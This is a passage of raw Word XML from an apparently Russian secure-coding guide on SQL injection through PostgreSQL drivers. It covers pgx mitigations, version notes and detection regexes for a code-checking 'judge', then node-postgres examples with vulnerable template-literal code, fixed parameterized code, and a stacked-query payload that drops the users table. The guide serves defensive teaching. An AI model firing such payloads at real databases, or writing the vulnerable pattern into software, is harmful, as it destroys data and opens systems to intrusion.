        <w:t xml:space="preserve"> для имён таблиц/колонок (см. 3.16).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A46A10E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Mitigations специфичные для драйвера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329D7685" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Не использовать `QueryExecModeSimpleProtocol`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в обработчиках с пользовательским вводом. Этот режим существует для PgBouncer transaction-mode и для legitimate multi-statement (migrations); включать его per-query там, где нужно, а не глобально.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD89D63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Всегда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-placeholders + args через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>...any</w:t>
      </w:r>
      <w:r>
        <w:t>. Конкатенация в SQL-строку остаётся анти-паттерном даже при extended-default — не из-за стакинга (сервер заблокирует), а из-за остальных категорий инъекций (UNION, error-based и т.д., см. 3.1–3.4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1ACD55" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Для динамических identifiers — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgx.Identifier{...}.Sanitize()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (квотит и экранирует), либо whitelist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51442512" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В коде судьи: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\.Query(Row)?\(ctx,\s*"[^"]*"\s*\+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\.Exec\(ctx,\s*"[^"]*"\s*\+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fmt\.Sprintf\([^)]*\)\s*$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> непосредственно перед </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conn.Query</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, проверка connection config на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>QueryExecModeSimpleProtocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>default_query_exec_mode=simple_protocol</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4F12A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8B9F2E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   pgx v5 (2022+) — текущая стабильная, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>QueryExecMode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API. Default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CacheStatement</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596693FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   pgx v4 (2019–2022) — старое API, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ConnConfig.PreferSimpleProtocol bool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (= extended). Семантика та же.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F47F028" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   pgx v3 и старше — deprecated, не покрываем.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D4FE8F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgxpool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (connection pool) — наследует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>QueryExecMode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от config.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27366721" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1F12C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   pgx v5 docs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>QueryExecMode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://pkg.go.dev/github.com/jackc/pgx/v5#QueryExecMode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2092E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   pgx repo: README раздел «Query Interface» — https://github.com/jackc/pgx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B027FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   pgx issue #1090 (поведение simple protocol) — https://github.com/jackc/pgx/issues/1090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FB1C15" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   pgx issue #1400 (multi-statement) — https://github.com/jackc/pgx/issues/1400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64711F2E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R20 (sources/research.md, строки 335–336)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C60179" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.5.6 node-postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61337006" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setup.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> node-postgres (npm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, актуальная ветка 8.13.x) — Node.js-драйвер для PostgreSQL, реализует wire-protocol на чистом JavaScript (есть и нативная C-обёртка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg-native</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через libpq). Логика выбора протокола в стандартном (не-native) клиенте:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D73B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>client.query(text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>client.query(text, [])</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без values </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>с непустой строкой</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>simple query protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (одно сообщение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552C1B26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>client.query(text, [v1, v2])</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>client.query({ text, values: [...] })</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с непустым values-массивом — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>extended protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Parse + Bind + Execute).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181A7672" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>client.query({ name, text, values })</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — named prepared statement, тоже extended, плюс server-side кэширование по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3EADA2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В simple-режиме node-postgres </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не делает client-side экранирование</w:t>
      </w:r>
      <w:r>
        <w:t>: либо values уходят отдельно через extended, либо SQL отправляется как есть. Это значит, что любая конкатенация / template-literal без второго аргумента — раздолье для стакинга.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6197FEDC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F19240D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app.get('/users', async (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2288D04E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  const { name } = req.query;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC020C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  const result = await client.query(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D76BA9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    `SELECT id, email FROM users WHERE name = '${name}'`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4A2269" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  res.json(result.rows);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20170531" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2EE3C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Template literal без values-массива. node-postgres получает строку и отправляет её одним simple-query сообщением.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E4D488" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Безопасный код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BA48B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app.get('/users', async (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05835544" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  const { name } = req.query;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6AD691" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  const result = await client.query(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB634E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'SELECT id, email FROM users WHERE name = $1', [name]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1758C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  res.json(result.rows);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B5FA22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E49B19D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + values как второй аргумент. node-postgres формирует Parse + Bind + Execute, значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> идёт как Bind-параметр.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2F7D8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F02F77" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `name`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D59A646" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x'; DROP TABLE users; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434C8E31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Путь 1: simple (уязвимый код, без values).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF7C191" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC9DABA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
